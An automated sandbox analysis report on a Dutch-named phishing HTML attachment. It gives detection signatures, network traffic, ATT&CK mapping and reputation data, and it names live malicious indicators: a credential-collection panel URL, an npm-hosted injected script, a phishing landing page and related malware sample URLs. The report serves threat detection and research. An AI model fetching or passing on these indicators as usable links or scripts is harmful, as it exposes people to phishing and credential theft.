Edit tour

Windows Analysis Report
Ontbrekende urenstaat.html

Overview

General Information

Sample name:	Ontbrekende urenstaat.html
Analysis ID:	1633764
MD5:	71ec830c0e5360c37c5575e26e15c7c5
SHA1:	f306ec8a0dae374d492df53e4550ad11e4719a10
SHA256:	4b93fc3bcdcfa7321ba8a406bf9134ce67822cfc9372e57e3e7d6a24fbb9142e
Infos:

Detection

Score:	52
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

HTML Script injector detected

Creates files inside the system directory

Deletes files inside the Windows folder

HTML page contains hidden javascript code

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

chrome.exe (PID: 6032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Ontbrekende urenstaat.html" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 4108 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2212,i,4204881716747169675,11110953007057725676,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2236 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=2212,i,4204881716747169675,11110953007057725676,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5568 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://noirlegacy-panel-1.website/api/uuurrlll

Avira URL Cloud: Label: malware

Phishing

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/Ontbrekende%20urenstaat.html

HTTP Parser: New script, src: https://cdn.jsdelivr.net/npm/slowingdown4u@1.0.2/hard.js

Source: Ontbrekende urenstaat.html

HTTP Parser: Base64 decoded: secure-codes

Source: Ontbrekende urenstaat.html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Ontbrekende%20urenstaat.html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Ontbrekende%20urenstaat.html	HTTP Parser: No favicon
Source: https://sun-shine.pages.dev/#?refid=YkhKclFISnZZMnQzYjI5c0xtTnZiUT09JnBhcmFwYXJhJmE=	HTTP Parser: No favicon

Source: Joe Sandbox View	IP Address: 151.101.1.229 151.101.1.229
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.73.143
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.63
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.184.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.184.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.184.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.184.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.184.195
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.184.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.184.195
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /npm/slowingdown4u@1.0.2/hard.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: sun-shine.pages.devConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: sun-shine.pages.devConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sun-shine.pages.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: global traffic	DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic	DNS traffic detected: DNS query: noirlegacy-panel-1.website
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: sun-shine.pages.dev

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Mon, 10 Mar 2025 14:05:43 GMTContent-Type: text/htmlContent-Length: 553Connection: closeCF-RAY: 91e35e5bfc547ae8-SJC
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Mon, 10 Mar 2025 14:05:44 GMTContent-Type: text/htmlContent-Length: 553Connection: closeCF-RAY: 91e35e5f5ec72510-SJC

Source: chromecache_56.1.dr

String found in binary or memory: https://noirlegacy-panel-1.website/api/uuurrlll

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir6032_408991196

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir6032_408991196

Jump to behavior

Source: classification engine

Classification label: mal52.phis.winHTML@23/9@10/5

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Packages\cr.sb.odm3E4D1A088C1F6D498C84F3C86DE73CE49F82A104

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Ontbrekende urenstaat.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2212,i,4204881716747169675,11110953007057725676,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2236 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=2212,i,4204881716747169675,11110953007057725676,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5568 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2212,i,4204881716747169675,11110953007057725676,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2236 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=2212,i,4204881716747169675,11110953007057725676,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5568 /prefetch:8	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	11 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://noirlegacy-panel-1.website/api/uuurrlll	100%	Avira URL Cloud	malware
https://sun-shine.pages.dev/favicon.ico	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/Ontbrekende%20urenstaat.html	0%	Avira URL Cloud	safe
https://sun-shine.pages.dev/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
jsdelivr.map.fastly.net	151.101.1.229	true	false	high
noirlegacy-panel-1.website	172.67.167.135	true	false	high
www.google.com	142.250.184.196	true	false	high
sun-shine.pages.dev	188.114.96.3	true	false	unknown
cdn.jsdelivr.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://sun-shine.pages.dev/#?refid=YkhKclFISnZZMnQzYjI5c0xtTnZiUT09JnBhcmFwYXJhJmE=	false		unknown
https://sun-shine.pages.dev/	false	Avira URL Cloud: safe	unknown
https://sun-shine.pages.dev/favicon.ico	false	Avira URL Cloud: safe	unknown
file:///C:/Users/user/Desktop/Ontbrekende%20urenstaat.html	true	Avira URL Cloud: safe	unknown
https://cdn.jsdelivr.net/npm/slowingdown4u@1.0.2/hard.js	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://noirlegacy-panel-1.website/api/uuurrlll	chromecache_56.1.dr	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
151.101.1.229	jsdelivr.map.fastly.net	United States	54113	FASTLYUS	false
142.250.184.196	www.google.com	United States	15169	GOOGLEUS	false
172.67.167.135	noirlegacy-panel-1.website	United States	13335	CLOUDFLARENETUS	false
188.114.96.3	sun-shine.pages.dev	European Union	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.9

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1633764
Start date and time:	2025-03-10 15:04:28 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Ontbrekende urenstaat.html
Detection:	MAL
Classification:	mal52.phis.winHTML@23/9@10/5
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.142, 142.250.185.67, 142.250.185.78, 66.102.1.84, 142.250.186.110, 142.250.185.110, 142.250.186.174, 142.250.185.206, 216.58.206.74, 142.250.181.234, 216.58.212.170, 142.250.185.234, 142.250.185.138, 142.250.186.106, 142.250.185.106, 142.250.186.74, 172.217.18.10, 172.217.16.202, 142.250.185.74, 216.58.206.42, 142.250.186.138, 142.250.185.170, 142.250.186.42, 142.250.185.202, 199.232.214.172, 142.250.186.142, 142.250.185.174, 142.250.184.238, 216.58.206.78, 216.58.212.142, 142.250.185.195, 142.250.184.206, 216.58.206.35, 142.250.186.78, 172.217.16.206, 142.250.185.238, 4.175.87.197, 23.199.214.10
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, c.pki.goog, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
151.101.1.229	http://www.ledger-secure03948.sssgva.com/	Get hash	malicious	Unknown	Browse	cdn.jsdelivr.net/jquery.magnific-popup/1.0.0/jquery.magnific-popup.min.js
188.114.96.3	3tEL1ZRXA6.exe	Get hash	malicious	FormBook	Browse	www.marposet.shop/6ixs/?Ar6T=oN0T/Esi7H2jJ4TMjw8b93BQPnEdNzyQiBUPeT1k8Z/eibB9ghV+qpvP7NsuhjacLnuX6HraU4xmdMUu2umYnCC8s1rtYFvj99qSyPPCwvQggIKSHQ==&Lfpd=o6ndcl
	2rvyZc27tz.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/50g8/
	INVOICE 4562.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/jjft/
	Payment-031025-pdf.exe	Get hash	malicious	FormBook	Browse	www.ezjytrkuqlw.info/zsr7/
	F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe	Get hash	malicious	FormBook	Browse	www.tgwfj.xyz/b5fo/
	yloe82Jp1k.exe	Get hash	malicious	FormBook	Browse	www.comebackhome.online/dv29/
	6KzB3ReZ6z.exe	Get hash	malicious	FormBook	Browse	www.clzt.shop/j1w0/
	3JZ4CUFqSs.exe	Get hash	malicious	FormBook	Browse	www.actpisalnplay.cyou/oxsm/
	g1V10ssekg.exe	Get hash	malicious	FormBook	Browse	www.comebackhome.online/dv29/?UPV=lyDuWv8anyDzCsrsL6PTwCreB/WdAINc3G6wsV0rNYv9zNmSH7KTJBB1K2WfFvHvPOh/z5cHktk3l1356pnt1M3PZl4mowifUTZkIWOf1ffB0d/Fsg==&YrV=FlsDgRMx
	thUKanu6GD.lnk	Get hash	malicious	HTMLPhisher, MalLnk	Browse	559236.na3.to/gift/setup4391.msi

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
jsdelivr.map.fastly.net	https://publizr.com/alliedcon/allied-construction	Get hash	malicious	Gabagool	Browse	151.101.1.229
	https://publizr.com/alliedcon/allied-construction	Get hash	malicious	Gabagool	Browse	151.101.193.229
	http://47musk.com	Get hash	malicious	Unknown	Browse	151.101.65.229
	https://linktr.ee/leena_Paul	Get hash	malicious	Unknown	Browse	151.101.65.229
	http://signaturerequestdocumentsmarch.sombrainfinita.de/uN7hn	Get hash	malicious	Unknown	Browse	151.101.129.229
	Play_Voicemail_Transcription._(387.KB).svg	Get hash	malicious	HTMLPhisher	Browse	151.101.193.229
	https://addsolutions.biz/accounting/heavyduty/heavydutymfg.html	Get hash	malicious	Unknown	Browse	151.101.1.229
	https://demanddistribution.com	Get hash	malicious	Unknown	Browse	151.101.1.229
	https://securefile395.outgrow.us/securefile395-9	Get hash	malicious	HTMLPhisher	Browse	151.101.193.229
	https://duro-dakovic.valbeeek-law.com/	Get hash	malicious	HTMLPhisher	Browse	151.101.129.229
sun-shine.pages.dev	proposal request.html.html	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
noirlegacy-panel-1.website	proposal request.html.html	Get hash	malicious	HTMLPhisher	Browse	104.21.82.11

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Emma Sparkes_cmrdpkuyjxetud.html	Get hash	malicious	HTMLPhisher	Browse	162.159.140.229
	https://publizr.com/alliedcon/allied-construction	Get hash	malicious	Gabagool	Browse	172.67.143.150
	sNtelKBdvr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	rgk62zzDVd.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.96.1
	https://publizr.com/alliedcon/allied-construction	Get hash	malicious	Gabagool	Browse	172.67.74.152
	ESrG8c98zz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.64.1
	ZS0Uo8zwGk.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.16.1
	B599ZYjsg4.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	unL24EiP4J.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	LdksctiMff.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
CLOUDFLARENETUS	Emma Sparkes_cmrdpkuyjxetud.html	Get hash	malicious	HTMLPhisher	Browse	162.159.140.229
	https://publizr.com/alliedcon/allied-construction	Get hash	malicious	Gabagool	Browse	172.67.143.150
	sNtelKBdvr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	rgk62zzDVd.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.96.1
	https://publizr.com/alliedcon/allied-construction	Get hash	malicious	Gabagool	Browse	172.67.74.152
	ESrG8c98zz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.64.1
	ZS0Uo8zwGk.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.16.1
	B599ZYjsg4.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	unL24EiP4J.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	LdksctiMff.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
FASTLYUS	https://publizr.com/alliedcon/allied-construction	Get hash	malicious	Gabagool	Browse	151.101.1.229
	https://publizr.com/alliedcon/allied-construction	Get hash	malicious	Gabagool	Browse	151.101.2.137
	https://github.com/fenwikk/rickroll/raw/main/roll.p1	Get hash	malicious	Unknown	Browse	185.199.109.133
	RECHNUNG_Lieferschein_001927.htm	Get hash	malicious	Unknown	Browse	151.101.194.137
	http://raretoonsindia.co	Get hash	malicious	Unknown	Browse	199.232.192.193
	https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#jake.totam@southwark.anglican.org	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.org	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	m5Pok55RGl.exe	Get hash	malicious	Unknown	Browse	185.199.108.153
	https://railrent.pexrayitech.com/	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	https://cdn-facxxx.b-cdn.net/	Get hash	malicious	Unknown	Browse	104.244.43.131

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 52

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	553
Entropy (8bit):	4.662821081936326
Encrypted:	false
SSDEEP:	12:TvgsoCVIogs01lI55aNGlTF5TF5TF5TF5TF5TFK:cEQtnstTPTPTPTPTPTc
MD5:	0127426BF3BA07FF7211399DDF5186C4
SHA1:	221D89F3261F545AC58848EBA300E0134C76FF9A
SHA-256:	982B986BB578E137F062099427A8CAEC3C501C84A9E4B22369EBD2BADEC42FE7
SHA-512:	6CEA4AB7D43A518A316120BF7AE340583E989A21FC3E142DDD71742D53A7AE6CFA276F232ACD6B6794444B28AA9A666C40171EE44341A7B9A3CA8453B61A371A
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://sun-shine.pages.dev/
Preview:	<html>..<head><title>403 Forbidden</title></head>..<body>..<center><h1>403 Forbidden</h1></center>..<hr><center>cloudflare</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..

Chrome Cache Entry: 53

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
